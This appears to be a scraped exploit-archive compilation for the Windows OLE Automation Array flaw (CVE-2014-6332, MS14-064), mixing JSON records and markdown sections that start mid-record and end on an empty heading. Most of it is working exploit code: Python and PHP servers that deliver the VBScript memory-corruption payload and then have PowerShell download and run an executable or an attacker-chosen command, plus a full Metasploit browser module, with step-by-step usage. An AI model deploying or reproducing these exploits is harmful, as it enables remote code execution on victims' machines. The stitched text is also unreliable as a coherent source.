4\\x69\\x6F\\x6E\\x20\\x44\\x65\\x6D\\x6F\\x3C\\x2F\\x73\\x74\\x72\\x6F\\x6E\\x67\\x3E\\x0D\\x0A\\x20\\x3C\\x62\\x72\\x20\\x2F\\x3E\\x0D\\x0A\\x20\\x3C\\x69\\x3E\\x45\\x68\
\x73\\x61\\x6E\\x20\\x4E\\x6F\\x72\\x65\\x64\\x64\\x69\\x6E\\x69\\x20\\x2D\\x20\\x40\\x70\\x72\\x6F\\x74\\x33\\x63\\x74\\x30\\x72\\x3C\\x69\\x3E\\x0D\\x0A\\x20\\x3C\\x62\\x72\\x20\\x2F\\x3E\\x3C\\x69\\x3E\\x65\\x68\\x73\\x61\\x6E\\x6E\\x2E\\x69\\x6E\\x66\\x6F\\x3C\\x2F\\x69\\x3E\\x0D\\x0A\\x20\\x3C\\x2F\\x63\\x65\\x6E\\x74\\x65\\x72\\x3E\\x0D\\x0A\\x3C\\x2F\\x62\\x6F\\x64\\x79\\x3E\\x0D\\x0A\\x3C\\x2F\\x68\\x74\\x6D\\x6C\\x3E\"; \n$msgd=str_replace(\"DOWNLOAD\",$link,$msgd); \nfor (;;) { \nif ($client = @socket_accept($socket)) { \nsocket_write($client, \"HTTP/1.1 200 OK\\r\\n\" . \n\"Content-length: \" . strlen($msgd) . \"\\r\\n\" . \n\"Content-Type: text/html; charset=UTF-8\\r\\n\\r\\n\" . \n$msgd); \nprint \"\\n Target Checked Your Link \\n\"; \n} \nelse usleep(100000); \n} \n \n \n?> \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/134061/theworldbrowser-exec.txt", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:21:55", "description": "", "cvss3": {}, "published": "2015-06-01T00:00:00", "type": "packetstorm", "title": "IBM Security AppScan 9.0.2 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-6332"], "modified": "2015-06-01T00:00:00", "id": "PACKETSTORM:132113", "href": "https://packetstormsecurity.com/files/132113/IBM-Security-AppScan-9.0.2-Remote-Code-Execution.html", "sourceData": "`#!/usr/bin/python \n \nimport BaseHTTPServer, socket \n \n## \n# IBM Security AppScan Standard OLE Automation Array Remote Code Execution \n# \n# Author: Naser Farhadi \n# Linkedin: http://ir.linkedin.com/pub/naser-farhadi/85/b3b/909 \n# \n# Date: 1 June 2015 # Version: <= 9.0.2 # Tested on: Windows 7 \n# \n# Exploit Based on MS14-064 CVE-2014-6332 http://www.exploit-db.com/exploits/35229/ \n# if you able to exploit IE then you can exploit appscan and acunetix ;) \n# This Python Script Will Start A Sample HTTP Server On Attacker Machine And 
Serves Exploit Code And \n# Metasploit windows/shell_bind_tcp Executable Payload \n# \n# Usage: \n# chmod +x appscan.py \n# ./appscan.py \n# ... \n# nc 172.20.10.14 333 \n# \n# Video: http://youtu.be/hPs1zQaBLMU \n## \n \nclass RequestHandler(BaseHTTPServer.BaseHTTPRequestHandler): \ndef do_GET(req): \nreq.send_response(200) \nif req.path == \"/payload.exe\": \nreq.send_header('Content-type', 'application/exe') \nreq.end_headers() \nexe = open(\"payload.exe\", 'rb') \nreq.wfile.write(exe.read()) \nexe.close() \nelse: \nreq.send_header('Content-type', 'text/html') \nreq.end_headers() \nreq.wfile.write(\"\"\"Please scan me! \n<SCRIPT LANGUAGE=\"VBScript\"> \nfunction runmumaa() \nOn Error Resume Next \nset shell=createobject(\"Shell.Application\") \ncommand=\"Invoke-Expression $(New-Object System.Net.WebClient).DownloadFile('http://\"\"\"+socket.gethostbyname(socket.gethostname())+\"\"\"/payload.exe',\\ \n'payload.exe');$(New-Object -com Shell.Application).ShellExecute('payload.exe');\" \nshell.ShellExecute \"powershell\", \"-Command \" & command, \"\", \"runas\", 0 \nend function \n \ndim aa() \ndim ab() \ndim a0 \ndim a1 \ndim a2 \ndim a3 \ndim win9x \ndim intVersion \ndim rnda \ndim funclass \ndim myarray \n \nBegin() \n \nfunction Begin() \nOn Error Resume Next \ninfo=Navigator.UserAgent \n \nif(instr(info,\"Win64\")>0) then \nexit function \nend if \n \nif (instr(info,\"MSIE\")>0) then \nintVersion = CInt(Mid(info, InStr(info, \"MSIE\") + 5, 2)) \nelse \nexit function \n \nend if \n \nwin9x=0 \n \nBeginInit() \nIf Create()=True Then \nmyarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00) \nmyarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0) \n \nif(intVersion<4) then \ndocument.write(\"<br> IE\") \ndocument.write(intVersion) \nrunshellcode() \nelse \nsetnotsafemode() \nend if \nend if \nend function \n \nfunction BeginInit() \nRandomize() \nredim aa(5) \nredim ab(5) \na0=13+17*rnd(6) \na3=7+3*rnd(5) \nend function \n \nfunction 
Create() \nOn Error Resume Next \ndim i \nCreate=False \nFor i = 0 To 400 \nIf Over()=True Then \n' document.write(i) \nCreate=True \nExit For \nEnd If \nNext \nend function \n \nsub testaa() \nend sub \n \nfunction mydata() \nOn Error Resume Next \ni=testaa \ni=null \nredim Preserve aa(a2) \n \nab(0)=0 \naa(a1)=i \nab(0)=6.36598737437801E-314 \n \naa(a1+2)=myarray \nab(2)=1.74088534731324E-310 \nmydata=aa(a1) \nredim Preserve aa(a0) \nend function \n \n \nfunction setnotsafemode() \nOn Error Resume Next \ni=mydata() \ni=readmemo(i+8) \ni=readmemo(i+16) \nj=readmemo(i+&h134) \nfor k=0 to &h60 step 4 \nj=readmemo(i+&h120+k) \nif(j=14) then \nj=0 \nredim Preserve aa(a2) \naa(a1+2)(i+&h11c+k)=ab(4) \nredim Preserve aa(a0) \n \nj=0 \nj=readmemo(i+&h120+k) \n \nExit for \nend if \n \nnext \nab(2)=1.69759663316747E-313 \nrunmumaa() \nend function \n \nfunction Over() \nOn Error Resume Next \ndim type1,type2,type3 \nOver=False \na0=a0+a3 \na1=a0+2 \na2=a0+&h8000000 \n \nredim Preserve aa(a0) \nredim ab(a0) \n \nredim Preserve aa(a2) \n \ntype1=1 \nab(0)=1.123456789012345678901234567890 \naa(a0)=10 \n \nIf(IsObject(aa(a1-1)) = False) Then \nif(intVersion<4) then \nmem=cint(a0+1)*16 \nj=vartype(aa(a1-1)) \nif((j=mem+4) or (j*8=mem+8)) then \nif(vartype(aa(a1-1))<>0) Then \nIf(IsObject(aa(a1)) = False ) Then \ntype1=VarType(aa(a1)) \nend if \nend if \nelse \nredim Preserve aa(a0) \nexit function \n \nend if \nelse \nif(vartype(aa(a1-1))<>0) Then \nIf(IsObject(aa(a1)) = False ) Then \ntype1=VarType(aa(a1)) \nend if \nend if \nend if \nend if \n \n \nIf(type1=&h2f66) Then \nOver=True \nEnd If \nIf(type1=&hB9AD) Then \nOver=True \nwin9x=1 \nEnd If \n \nredim Preserve aa(a0) \n \nend function \n \nfunction ReadMemo(add) \nOn Error Resume Next \nredim Preserve aa(a2) \n \nab(0)=0 \naa(a1)=add+4 \nab(0)=1.69759663316747E-313 \nReadMemo=lenb(aa(a1)) \n \nab(0)=0 \n \nredim Preserve aa(a0) \nend function \n \n</script>\"\"\") \n \nif __name__ == '__main__': \nsclass = 
BaseHTTPServer.HTTPServer \nserver = sclass((socket.gethostbyname(socket.gethostname()), 80), RequestHandler) \nprint \"Http server started\", socket.gethostbyname(socket.gethostname()), 80 \ntry: \nserver.serve_forever() \nexcept KeyboardInterrupt: \npass \nserver.server_close() \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/132113/ibmappscan-exec.txt", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:22:17", "description": "", "cvss3": {}, "published": "2015-08-22T00:00:00", "type": "packetstorm", "title": "Microsoft HTA (HTML Application) Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-6332"], "modified": "2015-08-22T00:00:00", "id": "PACKETSTORM:133261", "href": "https://packetstormsecurity.com/files/133261/Microsoft-HTA-HTML-Application-Remote-Code-Execution.html", "sourceData": "`Document Title: \n=============== \nMicrosoft HTA (HTML Application) - Remote Code Execution Vulnerability (MS14-064) \n \n \nReferences (Source): \n==================== \nhttp://www.vulnerability-lab.com/get_content.php?id=1576 \n \nVideo: http://youtu.be/Vkswz7vt23M \n \nhttp://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6332 \n \nCVE-ID: \n======= \nCVE-2014-6332 \n \n \nRelease Date: \n============= \n2015-08-15 \n \n \nVulnerability Laboratory ID (VL-ID): \n==================================== \n1576 \n \n \nCommon Vulnerability Scoring System: \n==================================== \n9.3 \n \n \nAbstract Advisory Information: \n============================== \nThe Vulnerability Laboratory discovered a remote code execution vulnerability in the Microsoft HTA (HTML Application) - MS14-064. 
\n \n \nVulnerability Disclosure Timeline: \n================================== \n2015-08-15: Public Disclosure (Vulnerability Laboratory) \n \n \nDiscovery Status: \n================= \nPublished \n \n \nExploitation Technique: \n======================= \nRemote \n \n \nSeverity Level: \n=============== \nHigh \n \n \nTechnical Details & Description: \n================================ \nOleAut32.dll in OLE in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, \nWindows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to execute arbitrary code via a crafted web site, as demonstrated by \nan array-redimensioning attempt that triggers improper handling of a size value in the SafeArrayDimen function, aka Windows OLE Automation \nArray Remote Code Execution Vulnerability. \n \n \nProof of Concept (PoC): \n======================= \nThe vulnerability can be exploited by remote attackers without user interaction or privilege application user accounts. \nFor security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. \n \nManual steps to reproduce ... \n1 . Run php code : php hta.php \n2 . Copy this php output (HTML) and Paste as poc.hta (Replace ip) \n3 . Open poc.hta \n4 . Your Link Download/Execute on your target \n5 . Finished ;) \n \n#!/usr/bin/php \n<?php \n# Title : Microsoft Windows HTA (HTML Application) - Remote Code Execution \n# Tested on Windows 7 / Server 2008 \n# \n# \n# Author : Mohammad Reza Espargham \n# Linkedin : https://ir.linkedin.com/in/rezasp \n# E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com \n# Website : www.reza.es \n# Twitter : https://twitter.com/rezesp \n# FaceBook : https://www.facebook.com/mohammadreza.espargham \n# \n# \n# MS14-064 \n# \n# \n# 1 . run php code : php hta.php \n# 2 . copy this php output (HTML) and Paste as poc.hta (Replace ip) \n# 3 . 
open poc.hta \n# 4 . Your Link Download/Execute on your target \n# 5 . Finished ;) \n# \n# Demo : http://youtu.be/Vkswz7vt23M \n# \n \n \n \n \n$port=80; # Port Address \n$link=\"http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe\"; # Your exe link \n \n \n \nprint \" Mohammad Reza Espargham\\n\\n\\n\"; \n \n$host= gethostname(); #g3th0stn4m3 \n$ip = gethostbyname($host); #g3th0stbyn4m3 \n \nprint \"Winrar HTML Code\\n\".'<html><head><title>poc</title><META http-equiv=\"refresh\" content=\"0;URL=http://' . $ip . '\"></head></html>'.\"\\n\\n\"; \n \n$reza = socket_create(AF_INET, SOCK_STREAM, 0) or die('Failed to create socket!'); \nsocket_bind($reza, 0,$port); \nsocket_listen($reza); \n \n$msgd = \n\"\\x3c\\x68\\x74\\x6d\\x6c\\x3e\\x0d\\x0a\\x3c\\x6d\\x65\\x74\\x61\\x20\\x68\\x74\\x74\\x70\\x2d\\x65\\x71\\x75\\x69\\x76\". \n\"\\x3d\\x22\\x58\\x2d\\x55\\x41\\x2d\\x43\\x6f\\x6d\\x70\\x61\\x74\\x69\\x62\\x6c\\x65\\x22\\x20\\x63\\x6f\\x6e\\x74\\x65\". \n\"\\x6e\\x74\\x3d\\x22\\x49\\x45\\x3d\\x45\\x6d\\x75\\x6c\\x61\\x74\\x65\\x49\\x45\\x38\\x22\\x20\\x3e\\x0d\\x0a\\x3c\\x68\". \n\"\\x65\\x61\\x64\\x3e\\x0d\\x0a\\x3c\\x2f\\x68\\x65\\x61\\x64\\x3e\\x0d\\x0a\\x3c\\x62\\x6f\\x64\\x79\\x3e\\x0d\\x0a\\x20\". \n\"\\x0d\\x0a\\x3c\\x53\\x43\\x52\\x49\\x50\\x54\\x20\\x4c\\x41\\x4e\\x47\\x55\\x41\\x47\\x45\\x3d\\x22\\x56\\x42\\x53\\x63\". \n\"\\x72\\x69\\x70\\x74\\x22\\x3e\\x0d\\x0a\\x0d\\x0a\\x66\\x75\\x6e\\x63\\x74\\x69\\x6f\\x6e\\x20\\x72\\x75\\x6e\\x6d\\x75\". \n\"\\x6d\\x61\\x61\\x28\\x29\\x20\\x0d\\x0a\\x4f\\x6e\\x20\\x45\\x72\\x72\\x6f\\x72\\x20\\x52\\x65\\x73\\x75\\x6d\\x65\\x20\". \n\"\\x4e\\x65\\x78\\x74\\x0d\\x0a\\x73\\x65\\x74\\x20\\x73\\x68\\x65\\x6c\\x6c\\x3d\\x63\\x72\\x65\\x61\\x74\\x65\\x6f\\x62\". \n\"\\x6a\\x65\\x63\\x74\\x28\\x22\\x53\\x68\\x65\\x6c\\x6c\\x2e\\x41\\x70\\x70\\x6c\\x69\\x63\\x61\\x74\\x69\\x6f\\x6e\\x22\". \n\"\\x29\\x0d\\x0a\\x63\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x3d\\x22\\x49\\x6e\\x76\\x6f\\x6b\\x65\\x2d\\x45\\x78\\x70\\x72\\x65\". 
"\x0a\x20\x0d\x0a\x3c\x2f\x62\x6f\x64\x79\x3e\x0d\x0a\x3c\x2f\x68\x74\x6d\x6c\x3e";
$msgd = str_replace("FILE_DOWNLOAD", $link, $msgd);

for (;;) {
    if ($client = @socket_accept($reza)) {
        socket_write($client, "HTTP/1.1 200 OK\r\n" .
            "Content-length: " . strlen($msgd) . "\r\n" .
            "Content-Type: text/html; charset=UTF-8\r\n\r\n" .
            $msgd);
        socket_close($client);
        print "\n Target Checked Your Link \n";
    } else {
        usleep(100000);
    }
}

?>


Security Risk:
==============
The security risk of the vulnerability in the HTML/HTA application is estimated as high (CVSS 9.3).


Credits & Authors:
==================
Author: Mohammad Reza Espargham
Linkedin: https://ir.linkedin.com/in/rezasp
E-Mail: me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
Website: www.reza.es
Twitter: https://twitter.com/rezesp
FaceBook: https://www.facebook.com/mohammadreza.espargham


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

Copyright © 2014 | Vulnerability Laboratory [Evolution Security]

--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt

Exploit source: <https://packetstormsecurity.com/files/download/133261/VL-1576.txt>. CVSS 2 base score 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C).

### Winamp Bento Browser Remote Code Execution (CVE-2014-6332)

Packet Storm [134079](<https://packetstormsecurity.com/files/134079/Winamp-Bento-Browser-Remote-Code-Execution.html>), published 2015-10-26. Exploit source: <https://packetstormsecurity.com/files/download/134079/winampbento-exec.txt>. CVSS 2 base score 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C).

The Packet Storm file stores the served page as a single `\xNN`-escaped PHP string; it is shown decoded below. The VBScript is yuange's CVE-2014-6332 proof of concept (the same code the Metasploit module further down carries in `vbs_prepare`), with `runmumaa()` launching PowerShell through `Shell.Application` once Safe Mode has been switched off.

```php
#!/usr/bin/php
<?php
/* ##########################################################
# Author    : Ehsan Noreddini
# E-Mail    : me@ehsann.info
# Social    : @prot3ct0r
# Title     : Winamp Bento Browser - Remote Command Execution
# Version   : Winamp 5.666
# CVE       : CVE-2014-6332
# Tested on : Windows7
# Date      : 24 October 2015
# Download  : http://www.filehorse.com/download-winamp/
# Website   : http://winamp.com
##########################################################
# 1. run php code : php exploit.php
# 2. get the output address and open it in browser !
##########################################################
# Original Code : http://ehsann.info/exploit/6.txt
# POC           : http://ehsann.info/video/winamp_r_c_e.mp4
##########################################################
*/

if (!isset($argv[1]) || in_array($argv[1], array("-h", "help", "--help", "-help"), true)) {
    print "
[+]Exploit Usage:

php exploit.php [COMMAND] [PORT]

[+]Example:

php exploit.php notepad.exe 80

";
    exit(1);
}

print "Command Execution Exploit\r\n";

// Port: second argument when it is numeric, otherwise 80.  Command-line
// arguments are strings, so is_integer() on $argv[2] can never be true.
$port = (isset($argv[2]) && ctype_digit($argv[2])) ? (int)$argv[2] : 80;
$command = $argv[1];
print "Server is started on localhost:$port\r\n";   // Start Exploit

$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP) or die('Failed to create socket!');
socket_bind($socket, '0.0.0.0', $port) or die('Failed to bind port ' . $port);
socket_listen($socket);

// MS14-064 landing page.  COMMAND is replaced with the attacker's command below;
// a nowdoc is used so the PowerShell "$(...)" is not interpolated by PHP.
$msgd = <<<'HTML'
<html>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<head>
</head>
<body>

<SCRIPT LANGUAGE="VBScript">
function runmumaa()
On Error Resume Next
set shell=createobject("Shell.Application")
command="Invoke-Expression $(New-Object -com Shell.Application).ShellExecute('COMMAND');"
shell.ShellExecute "powershell.exe", "-Command " & command, "", "runas", 0
end function
</script>

<SCRIPT LANGUAGE="VBScript">

dim   aa()
dim   ab()
dim   a0
dim   a1
dim   a2
dim   a3
dim   win9x
dim   intVersion
dim   rnda
dim   funclass
dim   myarray

Begin()

function Begin()
  On Error Resume Next
  info=Navigator.UserAgent

  if(instr(info,"Win64")>0)   then
     exit   function
  end if

  if (instr(info,"MSIE")>0)   then
             intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))
  else
     exit   function
  end if

  win9x=0

  BeginInit()
  If Create()=True Then
     myarray=        chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
     myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)

     if(intVersion<4) then
         document.write("<br> IE")
         document.write(intVersion)
         runshellcode()
     else
          setnotsafemode()
     end if
  end if
end function

function BeginInit()
   Randomize()
   redim aa(5)
   redim ab(5)
   a0=13+17*rnd(6)
   a3=7+3*rnd(5)
end function

function Create()
  On Error Resume Next
  dim i
  Create=False
  For i = 0 To 400
    If Over()=True Then
       Create=True
       Exit For
    End If
  Next
end function

sub testaa()
end sub

function mydata()
    On Error Resume Next
     i=testaa
     i=null
     redim  Preserve aa(a2)

     ab(0)=0
     aa(a1)=i
     ab(0)=6.36598737437801E-314

     aa(a1+2)=myarray
     ab(2)=1.74088534731324E-310
     mydata=aa(a1)
     redim  Preserve aa(a0)
end function


function setnotsafemode()
    On Error Resume Next
    i=mydata()
    i=rum(i+8)
    i=rum(i+16)
    j=rum(i+&h134)
    for k=0 to &h60 step 4
        j=rum(i+&h120+k)
        if(j=14) then
              j=0
              redim  Preserve aa(a2)
              aa(a1+2)(i+&h11c+k)=ab(4)
              redim  Preserve aa(a0)

              j=0
              j=rum(i+&h120+k)

              Exit for
        end if

    next
    ab(2)=1.69759663316747E-313
    runmumaa()
end function

function Over()
    On Error Resume Next
    dim type1,type2,type3
    Over=False
    a0=a0+a3
    a1=a0+2
    a2=a0+&h8000000

    redim  Preserve aa(a0)
    redim   ab(a0)

    redim  Preserve aa(a2)

    type1=1
    ab(0)=1.123456789012345678901234567890
    aa(a0)=10

    If(IsObject(aa(a1-1)) = False) Then
       if(intVersion<4) then
           mem=cint(a0+1)*16
           j=vartype(aa(a1-1))
           if((j=mem+4) or (j*8=mem+8)) then
              if(vartype(aa(a1-1))<>0)  Then
                 If(IsObject(aa(a1)) = False ) Then
                   type1=VarType(aa(a1))
                 end if
              end if
           else
             redim  Preserve aa(a0)
             exit  function

           end if
        else
           if(vartype(aa(a1-1))<>0)  Then
              If(IsObject(aa(a1)) = False ) Then
                  type1=VarType(aa(a1))
              end if
           end if
        end if
    end if


    If(type1=&h2f66) Then
          Over=True
    End If
    If(type1=&hB9AD) Then
          Over=True
          win9x=1
    End If

    redim  Preserve aa(a0)

end function

function rum(add)
    On Error Resume Next
    redim  Preserve aa(a2)

    ab(0)=0
    aa(a1)=add+4
    ab(0)=1.69759663316747E-313
    rum=lenb(aa(a1))

    ab(0)=0
    redim  Preserve aa(a0)
end function

</script>
 <center>
 <strong>This is a demo for the vulnerability.</strong>
 <br />
 <i>Ehsan Noreddini - @prot3ct0r</i>
 <br /><i>ehsann.info</i>
 </center>
</body>
</html>
HTML;
$msgd = str_replace("COMMAND", $command, $msgd);

for (;;) {
    if ($client = @socket_accept($socket)) {
        socket_write($client, "HTTP/1.1 200 OK\r\n" .
            "Content-length: " . strlen($msgd) . "\r\n" .
            "Content-Type: text/html; charset=UTF-8\r\n\r\n" .
            $msgd);
        socket_close($client);
        print "\n [+]Sending the exploit to target ... \r\n";
    } else {
        usleep(100000);
    }
}
?>
```

### Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution (CVE-2014-6332)

Packet Storm [129326](<https://packetstormsecurity.com/files/129326/Microsoft-Internet-Explorer-Windows-OLE-Automation-Array-Remote-Code-Execution.html>), published 2014-11-30. Module source: <https://packetstormsecurity.com/files/download/129326/ms14_064_ole_code_execution.rb.txt>. CVSS 2 base score 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C).

```ruby
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'msf/core/exploit/powershell'

class Metasploit4 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::BrowserExploitServer
  include Msf::Exploit::Remote::BrowserAutopwn
  include Msf::Exploit::Powershell

  autopwn_info({
    :ua_name    => HttpClients::IE,
    :ua_minver  => "3.0",
    :ua_maxver  => "10.0",
    :javascript => true,
    :os_name    => OperatingSystems::Match::WINDOWS,
    :rank       => ExcellentRanking
  })

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution",
      'Description'    => %q{
        This module exploits Windows OLE Automation Array Vulnerability known as CVE-2014-6332.
        The vulnerability affects Internet Explorer 3.0 until version 11 within Windows95 up to Windows 10.
        Powershell is required on the target machine. On Internet Explorer versions using Protected Mode,
        the user has to manually allow powershell.exe to execute in order to be compromised.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Robert Freeman', # IBM X-Force
          'yuange', # twitter.com/yuange75
          'Rik van Duijn', # twitter.com/rikvduijn
          'Wesley Neelen', # security[at]forsec.nl
          'GradiusX <francescomifsud[at]gmail.com>',
          'b33f', # @FuzzySec
        ],
      'References'     =>
        [
          [ 'CVE', '2014-6332' ],
          [ 'MSB', 'MS14-064' ],
          [ 'OSVDB', '114533' ],
          [ 'EDB', '35229' ],
          [ 'EDB', '35308' ],
          [ 'URL', 'http://securityintelligence.com/ibm-x-force-researcher-finds-significant-vulnerability-in-microsoft-windows' ],
          [ 'URL', 'https://forsec.nl/2014/11/cve-2014-6332-internet-explorer-msf-module' ]
        ],
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
        ],
      'BrowserRequirements' =>
        {
          :source  => /script|headers/i,
          :ua_name => HttpClients::IE,
          :os_name => /win/i,
          :arch    => 'x86',
          :ua_ver  => lambda { |ver| ver.to_i.between?(4, 10) }
        },
      'DefaultOptions' =>
        {
          'HTTP::compression' => 'gzip'
        },
      'Payload'        =>
        {
          'BadChars' => "\x00"
        },
      'Privileged'     => false,
      'DisclosureDate' => "Nov 13 2014",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptBool.new('TRYUAC', [true, 'Ask victim to start as Administrator', false]),
      ], self.class )

  end

  # yuange's VBScript: find the overlapping SafeArrays (Over/Create), leak an
  # object address (mydata), read memory through a forged BSTR (ReadMemo) and
  # clear the script engine's Safe Mode flag before calling runaaaa().
  def vbs_prepare()
    code = %Q|
dim   aa()
dim   ab()
dim   a0
dim   a1
dim   a2
dim   a3
dim   win9x
dim   intVersion
dim   rnda
dim   funclass
dim   myarray

Begin()

function Begin()
  On Error Resume Next
  info=Navigator.UserAgent

  if(instr(info,"Win64")>0)   then
     exit   function
  end if

  if (instr(info,"MSIE")>0)   then
             intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))
  else
     exit   function

  end if

  win9x=0

  BeginInit()
  If Create()=True Then
     myarray=        chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
     myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)

     if(intVersion<4) then
         document.write("<br> IE")
         document.write(intVersion)
         runshellcode()
     else
          setnotsafemode()
     end if
  end if
end function

function BeginInit()
   Randomize()
   redim aa(5)
   redim ab(5)
   a0=13+17*rnd(6)
   a3=7+3*rnd(5)
end function

function Create()
  On Error Resume Next
  dim i
  Create=False
  For i = 0 To 400
    If Over()=True Then
'      document.write(i)
       Create=True
       Exit For
    End If
  Next
end function

sub testaa()
end sub

function mydata()
    On Error Resume Next
     i=testaa
     i=null
     redim  Preserve aa(a2)

     ab(0)=0
     aa(a1)=i
     ab(0)=6.36598737437801E-314

     aa(a1+2)=myarray
     ab(2)=1.74088534731324E-310
     mydata=aa(a1)
     redim  Preserve aa(a0)
end function

function setnotsafemode()
    On Error Resume Next
    i=mydata()
    i=readmemo(i+8)
    i=readmemo(i+16)
    j=readmemo(i+&h134)
    for k=0 to &h60 step 4
        j=readmemo(i+&h120+k)
        if(j=14) then
              j=0
              redim  Preserve aa(a2)
              aa(a1+2)(i+&h11c+k)=ab(4)
              redim  Preserve aa(a0)

              j=0
              j=readmemo(i+&h120+k)

              Exit for
        end if

    next
    ab(2)=1.69759663316747E-313
    runaaaa()
end function

function Over()
    On Error Resume Next
    dim type1,type2,type3
    Over=False
    a0=a0+a3
    a1=a0+2
    a2=a0+&h8000000

    redim  Preserve aa(a0)
    redim   ab(a0)

    redim  Preserve aa(a2)

    type1=1
    ab(0)=1.123456789012345678901234567890
    aa(a0)=10

    If(IsObject(aa(a1-1)) = False) Then
       if(intVersion<4) then
           mem=cint(a0+1)*16
           j=vartype(aa(a1-1))
           if((j=mem+4) or (j*8=mem+8)) then
              if(vartype(aa(a1-1))<>0)  Then
                 If(IsObject(aa(a1)) = False ) Then
                   type1=VarType(aa(a1))
                 end if
              end if
           else
             redim  Preserve aa(a0)
             exit  function

           end if
        else
           if(vartype(aa(a1-1))<>0)  Then
              If(IsObject(aa(a1)) = False ) Then
                  type1=VarType(aa(a1))
              end if
           end if
        end if
    end if


    If(type1=&h2f66) Then
          Over=True
    End If
    If(type1=&hB9AD) Then
          Over=True
          win9x=1
    End If

    redim  Preserve aa(a0)

end function

function ReadMemo(add)
    On Error Resume Next
    redim  Preserve aa(a2)

    ab(0)=0
    aa(a1)=add+4
    ab(0)=1.69759663316747E-313
    ReadMemo=lenb(aa(a1))

    ab(0)=0

    redim  Preserve aa(a0)
end function

    |

  end

  def get_html()

    if datastore['TRYUAC']
      tryuac = 'runas'
    else
      tryuac = 'open'
    end

    payl = cmd_psh_payload(payload.encoded,"x86",{ :remove_comspec => true })
    payl.slice! "powershell.exe "
    prep = vbs_prepare()

    html = %Q|
<!doctype html>
<html>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<body>
<script language="VBScript">
function runaaaa()
On Error Resume Next

set shell=createobject("Shell.Application")
shell.ShellExecute "powershell.exe", "#{payl}", "", "#{tryuac}", 0

end function
</script>
<script language="VBScript">
#{prep}
</script>
</body>
</html>
    |

  end

  def on_request_exploit(cli, request, target_info)
    print_status("Requesting: #{request.uri}")
    send_exploit_html(cli, get_html())
  end

end
```

### Windows OLE Automation Array Remote Code Execution (CVE-2014-6332)

